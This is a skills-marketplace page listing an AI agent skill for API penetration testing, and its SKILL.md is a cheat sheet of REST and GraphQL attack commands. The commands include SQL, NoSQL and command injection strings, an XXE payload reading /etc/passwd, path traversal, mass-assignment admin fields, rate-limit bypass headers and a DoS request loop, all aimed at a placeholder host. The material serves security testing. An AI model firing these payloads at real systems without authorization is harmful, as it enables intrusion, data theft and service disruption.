تشغيل أي مهارة في Manus بنقرة واحدة

testing-apis

Test REST and GraphQL APIs for authentication bypasses, authorization flaws, IDOR, mass assignment, injection attacks, and rate limiting issues. Use when pentesting APIs or testing microservices security.

تشغيل في Manus

نظرة عامة

أمر التثبيت

npx skills add https://github.com/trilwu/secskills --skill testing-apis

انسخ والصق هذا الأمر في Claude Code لتثبيت المهارة

المصدر

trilwu/secskills

النجوم٥٨

التفرعات٦

آخر تحديث١٤ نوفمبر ٢٠٢٥ في ٠٩:٤٥

SKILL.md

readonly

المزيد من هذا المستودع

نفس المستودع

attacking-active-directory

trilwu/secskills

Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations.

2025-11-1458

exploiting-cloud-platforms

trilwu/secskills

Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.

2025-11-1458

exploiting-containers

trilwu/secskills

Escape Docker containers and exploit Kubernetes clusters using privileged containers, Docker socket access, misconfigurations, and API abuse. Use when testing container security or performing container escape.

2025-11-1458

transferring-files

trilwu/secskills

Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.

2025-11-1458

performing-reconnaissance

trilwu/secskills

Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access. Use when gathering intelligence or mapping attack surface.

2025-11-1458

escalating-linux-privileges

trilwu/secskills

Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes. Use when performing Linux post-exploitation or privilege escalation.

2025-11-1458

المصدر

trilwu

trilwu/secskills

فتح مستودع GitHub عرض مستودعات المنشئ

أمر التثبيت

تنزيل

تشغيل في Manus

مفيد لـSOC

محللو أمن المعلوماتمهن الحاسوب والرياضيات15-1212L4

name	testing-apis
description	Test REST and GraphQL APIs for authentication bypasses, authorization flaws, IDOR, mass assignment, injection attacks, and rate limiting issues. Use when pentesting APIs or testing microservices security.

API Security Testing Skill

You are an API security expert specializing in REST, GraphQL, and API pentesting. Use this skill when the user requests help with:

REST API security testing
GraphQL API exploitation
API authentication bypass
API authorization flaws
Rate limiting bypass
API fuzzing
Mass assignment vulnerabilities
API documentation discovery

Core Methodologies

1. API Discovery and Reconnaissance

Find API Endpoints:

# Common API paths
/api/
/api/v1/
/api/v2/
/rest/
/graphql
/swagger
/api-docs
/swagger.json
/swagger.yaml
/openapi.json
/api/swagger-ui/
/api/docs

# Directory fuzzing for APIs
ffuf -u https://target.com/FUZZ -w api-wordlist.txt -mc 200,301,302,403
gobuster dir -u https://target.com -w api-paths.txt

# JavaScript analysis
# Extract API endpoints from JS files
cat app.js | grep -Eo "(GET|POST|PUT|DELETE|PATCH)\s+['\"]([^'\"]+)"

API Documentation:

# Swagger/OpenAPI
curl https://target.com/swagger.json
curl https://target.com/v2/swagger.json
curl https://target.com/api-docs

# Check for exposed docs
https://target.com/docs
https://target.com/api/docs
https://target.com/swagger-ui/
https://target.com/redoc

Subdomain Enumeration for APIs:

# Common API subdomains
api.target.com
api-dev.target.com
api-staging.target.com
api-prod.target.com
rest.target.com
graphql.target.com

# Subdomain fuzzing
ffuf -u https://FUZZ.target.com -w subdomains.txt

2. REST API Testing

HTTP Methods Testing:

# Check all HTTP methods
curl -X GET https://api.target.com/users/1
curl -X POST https://api.target.com/users
curl -X PUT https://api.target.com/users/1
curl -X DELETE https://api.target.com/users/1
curl -X PATCH https://api.target.com/users/1
curl -X HEAD https://api.target.com/users/1
curl -X OPTIONS https://api.target.com/users/1

# Check for method override
curl -X POST https://api.target.com/users/1 -H "X-HTTP-Method-Override: DELETE"
curl -X POST https://api.target.com/users/1 -H "X-Method-Override: PUT"

Authentication Testing:

# No authentication
curl https://api.target.com/users

# Bearer token
curl https://api.target.com/users -H "Authorization: Bearer TOKEN"

# Basic auth
curl -u username:password https://api.target.com/users

# API key
curl https://api.target.com/users?api_key=KEY
curl https://api.target.com/users -H "X-API-Key: KEY"

# JWT token
curl https://api.target.com/users -H "Authorization: Bearer eyJhbGc..."

IDOR (Insecure Direct Object Reference):

# Test sequential IDs
curl https://api.target.com/users/1
curl https://api.target.com/users/2
curl https://api.target.com/users/100

# Test UUIDs
curl https://api.target.com/users/550e8400-e29b-41d4-a716-446655440000

# Test with different users
# User A's token accessing User B's data
curl https://api.target.com/users/2 -H "Authorization: Bearer USER_A_TOKEN"

Mass Assignment:

# Modify request to include unexpected fields
# Original: {"username":"test","email":"test@test.com"}
# Modified: {"username":"test","email":"test@test.com","role":"admin","is_admin":true}

curl -X POST https://api.target.com/users \
  -H "Content-Type: application/json" \
  -d '{"username":"hacker","email":"hack@test.com","role":"admin","is_admin":true}'

# Common fields to try
# role, is_admin, admin, user_level, permissions, credits, balance

Excessive Data Exposure:

# Check response for sensitive data
curl https://api.target.com/users | jq

# Look for:
# - Password hashes
# - Internal IDs
# - Email addresses
# - API keys
# - Tokens
# - PII

3. GraphQL API Testing

GraphQL Discovery:

# Common GraphQL endpoints
/graphql
/graphql/console
/graphql/graphiql
/graphiql
/api/graphql
/v1/graphql

# Introspection query (check if enabled)
curl https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { types { name } } }"}'

GraphQL Introspection:

# Full introspection query
{
  __schema {
    types {
      name
      fields {
        name
        type {
          name
          kind
        }
      }
    }
  }
}

# Query specific type
{
  __type(name: "User") {
    name
    fields {
      name
      type {
        name
      }
    }
  }
}

GraphQL Queries:

# Basic query
curl https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ users { id username email } }"}'

# Query with variables
curl https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query($id: Int!) { user(id: $id) { username email } }","variables":{"id":1}}'

# Mutation
curl https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"mutation { updateUser(id: 1, role: \"admin\") { id role } }"}'

GraphQL Vulnerabilities:

# Test for IDOR
{"query":"{ user(id: 2) { id email password } }"}

# Test for mass assignment
{"query":"mutation { updateUser(id: 1, role: \"admin\", isAdmin: true) }"}

# Batch queries (DoS potential)
{"query":"{ user1: user(id: 1) { id } user2: user(id: 2) { id } ... }"}

# Deep nested queries (DoS)
{"query":"{ user { posts { comments { user { posts { comments { ... } } } } } }"}

# Alias abuse
{"query":"{ a: users { id } b: users { id } c: users { id } ... }"}

4. Authorization Testing

Horizontal Privilege Escalation:

# User A trying to access User B's resources
# Get User A's token
TOKEN_A=$(curl -X POST https://api.target.com/login -d '{"username":"userA","password":"passA"}' | jq -r .token)

# Try to access User B's data with User A's token
curl https://api.target.com/users/2 -H "Authorization: Bearer $TOKEN_A"
curl https://api.target.com/users/2/orders -H "Authorization: Bearer $TOKEN_A"

Vertical Privilege Escalation:

# Regular user trying to access admin functions
# Get regular user token
TOKEN_USER=$(curl -X POST https://api.target.com/login -d '{"username":"user","password":"pass"}' | jq -r .token)

# Try admin endpoints
curl https://api.target.com/admin/users -H "Authorization: Bearer $TOKEN_USER"
curl -X DELETE https://api.target.com/admin/users/1 -H "Authorization: Bearer $TOKEN_USER"

Function Level Authorization:

# Test all endpoints with different user roles
# - Unauthenticated
# - Low-privilege user
# - Medium-privilege user
# - Admin user

# Endpoints to test
GET /api/admin/*
POST /api/admin/*
DELETE /api/admin/*
PUT /api/admin/*

5. Rate Limiting and DoS

Test Rate Limits:

# Rapid requests
for i in {1..1000}; do
  curl https://api.target.com/expensive-endpoint &
done

# Check response headers
curl -I https://api.target.com/endpoint
# Look for:
# X-RateLimit-Limit
# X-RateLimit-Remaining
# X-RateLimit-Reset
# Retry-After

Rate Limit Bypass:

# Change IP (X-Forwarded-For, X-Real-IP)
curl https://api.target.com/endpoint -H "X-Forwarded-For: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Real-IP: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Originating-IP: 1.2.3.4"

# Change User-Agent
curl https://api.target.com/endpoint -H "User-Agent: Different-Agent"

# Add junk parameters
curl https://api.target.com/endpoint?random=123
curl https://api.target.com/endpoint?random=456

# Case manipulation
curl https://api.target.com/Endpoint
curl https://api.target.com/ENDPOINT

6. API Fuzzing

Parameter Fuzzing:

# ffuf for parameter discovery
ffuf -u https://api.target.com/endpoint?FUZZ=test -w parameters.txt

# Arjun
arjun -u https://api.target.com/endpoint

# Test various inputs
curl https://api.target.com/users?id=1
curl https://api.target.com/users?id=../../etc/passwd
curl https://api.target.com/users?id=<script>alert(1)</script>
curl https://api.target.com/users?id=' OR '1'='1

Fuzzing with wfuzz:

# POST data fuzzing
wfuzz -z file,wordlist.txt -d "username=FUZZ&password=test" https://api.target.com/login

# Header fuzzing
wfuzz -z file,wordlist.txt -H "X-Custom-Header: FUZZ" https://api.target.com/endpoint

Content-Type Confusion:

# Try different content types
curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/json" \
  -d '{"user":"admin"}'

curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/xml" \
  -d '<user>admin</user>'

curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 'user=admin'

# Send JSON to XML endpoint and vice versa

7. API Security Tools

Burp Suite:

# Send requests to Repeater for manual testing
# Use Intruder for fuzzing
# Scan with active/passive scanner
# Use extensions: Autorize, AuthMatrix, JWT4B

Postman:

# Import API collection
# Test all endpoints
# Use environment variables for tokens
# Create test scripts
# Export collection for collaboration

OWASP ZAP:

# Automated API scan
zap-cli quick-scan https://api.target.com

# Spider API
zap-cli spider https://api.target.com

# Active scan
zap-cli active-scan https://api.target.com

API-specific Tools:

# RESTler (Microsoft) - REST API fuzzer
git clone https://github.com/microsoft/restler-fuzzer
python3 restler.py --api_spec swagger.json

# Kiterunner - API endpoint discovery
kr scan https://target.com -w routes.txt

# Nuclei with API templates
nuclei -u https://api.target.com -t ~/nuclei-templates/api/

8. API Injection Attacks

SQL Injection:

# In query parameters
curl "https://api.target.com/users?id=1' OR '1'='1"
curl "https://api.target.com/users?id=1 UNION SELECT password FROM admin--"

# In JSON body
curl -X POST https://api.target.com/search \
  -H "Content-Type: application/json" \
  -d '{"query":"test\' OR \'1\'=\'1"}'

Command Injection:

# In parameters
curl "https://api.target.com/ping?host=8.8.8.8;whoami"
curl "https://api.target.com/ping?host=8.8.8.8|id"

# In JSON
curl -X POST https://api.target.com/diagnostic \
  -H "Content-Type: application/json" \
  -d '{"command":"ping;whoami"}'

NoSQL Injection:

# MongoDB injection
curl -X POST https://api.target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username":{"$ne":null},"password":{"$ne":null}}'

curl -X POST https://api.target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":{"$regex":".*"}}'

XXE in XML APIs:

# If API accepts XML
curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?>
      <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
      <user><name>&xxe;</name></user>'

9. API Documentation Analysis

Swagger/OpenAPI Analysis:

# Download spec
curl https://api.target.com/swagger.json > swagger.json

# Analyze with jq
cat swagger.json | jq '.paths'
cat swagger.json | jq '.definitions'

# Extract all endpoints
cat swagger.json | jq -r '.paths | keys[]'

# Find parameters
cat swagger.json | jq '.paths[].get.parameters'

10. API Security Checklist

Authentication:

Authorization:

Test IDOR vulnerabilities
Test horizontal privilege escalation
Test vertical privilege escalation
Test function-level authorization
Test missing authorization checks

Input Validation:

Business Logic:

Configuration:

Quick Testing Commands

Test Endpoint:

# GET request
curl -v https://api.target.com/endpoint

# POST with JSON
curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/json" \
  -d '{"key":"value"}'

# With authentication
curl https://api.target.com/endpoint \
  -H "Authorization: Bearer TOKEN"

# See full response
curl -i https://api.target.com/endpoint

Troubleshooting

CORS Issues:

# Check CORS headers
curl -H "Origin: https://evil.com" https://api.target.com/endpoint

# Look for:
# Access-Control-Allow-Origin: *
# Access-Control-Allow-Credentials: true

Rate Limited:

# Add delays between requests
for i in {1..100}; do curl https://api.target.com/endpoint; sleep 1; done

# Try bypass techniques (X-Forwarded-For, etc.)

Reference Links

OWASP API Security Top 10: https://owasp.org/www-project-api-security/
HackTricks API Testing: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql
API Security Best Practices: https://github.com/OWASP/API-Security
PayloadsAllTheThings API: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks

When to Use This Skill

Activate this skill when the user asks to:

Test REST or GraphQL APIs
Find API vulnerabilities
Bypass API authentication/authorization
Discover API endpoints
Test API business logic
Perform API fuzzing
Analyze API documentation
Help with API penetration testing

Always ensure proper authorization before testing any API.